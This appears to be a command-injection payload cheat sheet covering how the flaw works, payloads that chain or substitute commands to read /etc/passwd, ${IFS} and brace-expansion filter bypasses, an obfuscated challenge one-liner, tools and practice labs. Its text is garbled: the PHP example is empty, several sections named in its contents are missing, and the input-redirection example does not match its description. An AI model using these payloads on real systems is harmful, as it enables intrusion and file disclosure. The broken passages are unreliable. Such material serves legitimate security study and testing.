# Command Injection > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. ## Summary * [Tools](#tools) * [Exploits](#exploits) * [Basic commands](#basic-commands) * [Chaining commands](#chaining-commands) * [Inside a command](#inside-a-command) * [Filter Bypasses](#filter-bypasses) * [Bypass without space](#bypass-without-space) * [Bypass with a line return](#bypass-with-a-line-return) * [Bypass with backslash newline](#bypass-with-backslash-newline) * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) * [Bypass blacklisted words](#bypass-blacklisted-words) * [Bypass with single quote](#bypass-with-single-quote) * [Bypass with double quote](#bypass-with-double-quote) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with $@](#bypass-with-) * [Bypass with $()](#bypass-with--1) * [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with wildcards](#bypass-with-wildcards) * [Data Exfiltration](#data-exfiltration) * [Time based data exfiltration](#time-based-data-exfiltration) * [DNS based data exfiltration](#dns-based-data-exfiltration) * [Polyglot command injection](#polyglot-command-injection) * [Tricks](#tricks) * [Backgrounding long running commands](#backgrounding-long-running-commands) * [Remove arguments after the injection](#remove-arguments-after-the-injection) * [Labs](#labs) * [Challenge](#challenge) * [References](#references) ## Tools * [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library ## Exploits Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system. The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise. **Example of Command Injection with PHP**: Suppose you have a PHP script that takes a user input to ping a specified IP address or domain: ```php ``` In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter. If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`. This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information. ### Basic commands Execute the command and voila :p ```powershell cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ... ``` ### Chaining commands In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands. * `;` (Semicolon): Allows you to execute multiple commands sequentially. * `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status). * `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status). * `&` (Background): Execute the command in the background, allowing the user to continue using the shell. * `|` (Pipe): Takes the output of the first command and uses it as the input for the second command. ```powershell command1; command2 # Execute command1 and then command2 command1 && command2 # Execute command2 only if command1 succeeds command1 || command2 # Execute command2 only if command1 fails command1 & command2 # Execute command1 in the background command1 | command2 # Pipe the output of command1 into command2 ``` ### Inside a command * Command injection using backticks. ```bash original_cmd_by_server `cat /etc/passwd` ``` * Command injection using substitution ```bash original_cmd_by_server $(cat /etc/passwd) ``` ## Filter Bypasses ### Bypass without space * `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a seperator in commands like `ls`, `wget`; use `${IFS}` instead. ```powershell cat${IFS}/etc/passwd ls${IFS}-la ``` * In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments. ```powershell {cat,/etc/passwd} ``` * Input redirection. The < character tells the shell to read the contents of the file specified. ```powershell cat /dev/null & ``` ### Remove arguments after the injection In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options. ## Labs * [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) * [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) * [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) * [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) * [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) ## Challenge Challenge based on the previous tricks, what does the following command do: ```powershell g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} ``` ## References * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192) * [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)